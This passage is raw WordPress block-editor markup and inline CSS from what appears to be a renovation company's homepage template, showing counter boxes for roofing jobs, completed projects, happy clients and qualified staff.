.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"876ad3dc-62d4-4656-a484-5cb2941ef978\"} -->\n<style type=\"text/css\"> .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-876ad3dc-62d4-4656-a484-5cb2941ef978\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"fcd25d96-31cf-4465-9efa-36881a5ba21e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">541+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"2a47d1fd-92e1-4c68-b763-70488f27ad66\"} -->\n<style type=\"text/css\"> .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a47d1fd-92e1-4c68-b763-70488f27ad66\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"6aed668a-fb10-4525-96ac-4bc41b761fd7\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\"} -->\n<style type=\"text/css\"> .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">Our</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"42aff9bf-25ea-43ea-b807-8a8c00c85148\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-42aff9bf-25ea-43ea-b807-8a8c00c85148 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image 